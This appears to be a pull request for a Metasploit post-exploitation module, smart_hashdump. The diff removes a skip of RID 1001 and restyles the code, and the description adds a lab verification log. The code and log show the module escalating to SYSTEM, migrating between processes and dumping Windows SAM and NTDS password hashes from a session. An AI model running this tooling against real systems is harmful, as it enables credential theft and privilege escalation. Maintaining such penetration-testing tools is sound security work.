       # Check we are not migrating to a process that can BSOD the host
-      next if dangerous_processes.include?(p["name"])
+      next if dangerous_processes.include?(p['name'])
 
-      next if p["pid"] == session.sys.process.getpid
+      next if p['pid'] == session.sys.process.getpid
 
-      if p["user"] == system_account_name
-        print_status("Migrating to #{p["name"]}")
-        session.core.migrate(p["pid"])
-        print_good("Successfully migrated to #{p["name"]}")
-        return
-      end
+      next unless p['user'] == system_account_name
+
+      print_status("Migrating to #{p['name']}")
+      session.core.migrate(p['pid'])
+      print_good("Successfully migrated to #{p['name']}")
+      return
     end
   end
 
@@ -410,29 +418,29 @@ class MetasploitModule < Msf::Post
 
   def smart_hash_dump(migrate_system, pwdfile)
     domain_controler = is_dc?
-    if not is_uac_enabled? or is_admin?
-      print_status("Dumping password hashes...")
+    if !is_uac_enabled? || is_admin?
+      print_status('Dumping password hashes...')
       # Check if Running as SYSTEM
       if is_system?
         # For DC's the registry read method does not work.
         if domain_controler
           begin
-            file_local_write(pwdfile,inject_hashdump)
-          rescue::Exception => e
-            print_error("Failed to dump hashes as SYSTEM, trying to migrate to another process")
+            file_local_write(pwdfile, inject_hashdump)
+          rescue ::Exception => e
+            print_error('Failed to dump hashes as SYSTEM, trying to migrate to another process')
 
             if sysinfo['OS'] =~ /Windows (2008|2012)/i
               move_to_sys
-              file_local_write(pwdfile,inject_hashdump)
+              file_local_write(pwdfile, inject_hashdump)
             else
-              print_error("Could not get NTDS hashes!")
+              print_error('Could not get NTDS hashes!')
             end
           end
 
           # Check if not DC
         else
-          print_status "Running as SYSTEM extracting hashes from registry"
-          file_local_write(pwdfile,read_hashdump)
+          print_status 'Running as SYSTEM extracting hashes from registry'
+          file_local_write(pwdfile, read_hashdump)
         end
 
         # Check if not running as SYSTEM
@@ -441,62 +449,61 @@ class MetasploitModule < Msf::Post
         # Check if Domain Controller
         if domain_controler
           begin
-            file_local_write(pwdfile,inject_hashdump)
-          rescue
+            file_local_write(pwdfile, inject_hashdump)
+          rescue StandardError
             if migrate_system
-              print_status("Trying to get SYSTEM privilege")
+              print_status('Trying to get SYSTEM privilege')
               results = session.priv.getsystem
               if results[0]
-                print_good("Got SYSTEM privilege")
+                print_good('Got SYSTEM privilege')
                 if session.sys.config.sysinfo['OS'] =~ /Windows (2008|2012)/i
                   # Migrate process since on Windows 2008 R2 getsystem
                   # does not set certain privilege tokens required to
                   # inject and dump the hashes.
                   move_to_sys
                 end
-                file_local_write(pwdfile,inject_hashdump)
+                file_local_write(pwdfile, inject_hashdump)
               else
-                print_error("Could not obtain SYSTEM privileges")
+                print_error('Could not obtain SYSTEM privileges')
               end
             else
-              print_error("Could not get NTDS hashes!")
+              print_error('Could not get NTDS hashes!')
             end
-
           end
         elsif sysinfo['OS'] =~ /Windows (7|8|2008|2012|Vista)/i
           if migrate_system
-            print_status("Trying to get SYSTEM privilege")
+            print_status('Trying to get SYSTEM privilege')
             results = session.priv.getsystem
             if results[0]
-              print_good("Got SYSTEM privilege")
-              file_local_write(pwdfile,read_hashdump)
+              print_good('Got SYSTEM privilege')
+              file_local_write(pwdfile, read_hashdump)
             else
-              print_error("Could not obtain SYSTEM privilege")
+              print_error('Could not obtain SYSTEM privilege')
             end
           else
-            print_error("On this version of Windows you need to be NT AUTHORITY\\SYSTEM to dump the hashes")
-            print_error("Try setting GETSYSTEM to true.")
+            print_error('On this version of Windows you need to be NT AUTHORITY\\SYSTEM to dump the hashes')
+            print_error('Try setting GETSYSTEM to true.')
           end
 
         else
           if migrate_system
-            print_status("Trying to get SYSTEM privilege")
+            print_status('Trying to get SYSTEM privilege')
             results = session.priv.getsystem
             if results[0]
-              print_good("Got SYSTEM privilege")
-              file_local_write(pwdfile,read_hashdump)
+              print_good('Got SYSTEM privilege')
+              file_local_write(pwdfile, read_hashdump)
             else
-              print_error("Could not obtain SYSTEM privileges")
+              print_error('Could not obtain SYSTEM privileges')
             end
           else
-            file_local_write(pwdfile,inject_hashdump)
+            file_local_write(pwdfile, inject_hashdump)
           end
 
         end
 
       end
     else
-      print_error("Insufficient privileges to dump hashes!")
+      print_error('Insufficient privileges to dump hashes!')
     end
   end
 end

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -239,8 +239,8 @@ class MetasploitModule < Msf::Post
 
       print_status("\tDumping password hashes...")
       users.keys.sort{|a,b| a<=>b}.each do |rid|
-        # next if guest account or support account
-        next if rid == 501 or rid == 1001
+        # next if guest account
+        next if rid == 501
         collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
 
         print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
@@ -315,7 +315,7 @@ class MetasploitModule < Msf::Post
       rid =  returned_hash[1].to_i
 
       # Skip the Guest Account
-      next if rid == 501 or rid == 1001
+      next if rid == 501
 
       # skip if it returns nil for an entry
       next if h == nil


### PR DESCRIPTION
This addresses issue #14094 by removing the condition to skip RID 1001 in commit ac4159b.

The following commits address applying rubocop's styling fixes to this module (of which there were many, but mostly just changing double quotes to single quotes, and whitespace adjustments), and supplying some basic documentation for the module.

## Verification

Tested against a clean Windows 10 r2004 VM (same example provided into the module).

```
msf6 exploit(multi/handler) > sessions -v
  Session ID: 1
        Name:
        Type: meterpreter windows
        Info: DESKTOP-G7A2R2R\user @ DESKTOP-G7A2R2R
      Tunnel: 192.168.56.118:4444 -> 192.168.56.117:49680 (192.168.56.117)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: bd2a0bae4a53009e/x86=1/windows=1/2020-10-08T03:42:16Z
     CheckIn: 4s ago @ 2020-10-08 12:52:17 +0900
  Registered: No

msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
msf6 post(windows/gather/smart_hashdump) > set  SESSION 1
SESSION => 1
msf6 post(windows/gather/smart_hashdump) > run

[*] Running module against DESKTOP-G7A2R2R
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/kali/.msf4/loot/20201008121933_default_192.168.56.117_windows.hashes_338495.txt
[-] Insufficient privileges to dump hashes!
[*] Post module execution completed
msf6 post(windows/gather/smart_hashdump) > set GETSYSTEM true
GETSYSTEM => true
msf6 post(windows/gather/smart_hashdump) > run

[*] Running module against DESKTOP-G7A2R2R
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/kali/.msf4/loot/20201008122008_default_192.168.56.117_windows.hashes_353942.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4934844cf0365459683ed18d9ebcb903...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[*]     No users with password hints on this system
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     user:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Post module execution completed
```

Note RID 1001 is now displayed/dumped.

Some basic Googling and searching for other places in Meterpreter where and _why_ we might be skipping RID 1001 did not turn up any relevant or interesting, so I think this condition can be safely removed.

Thanks for everything you guys do!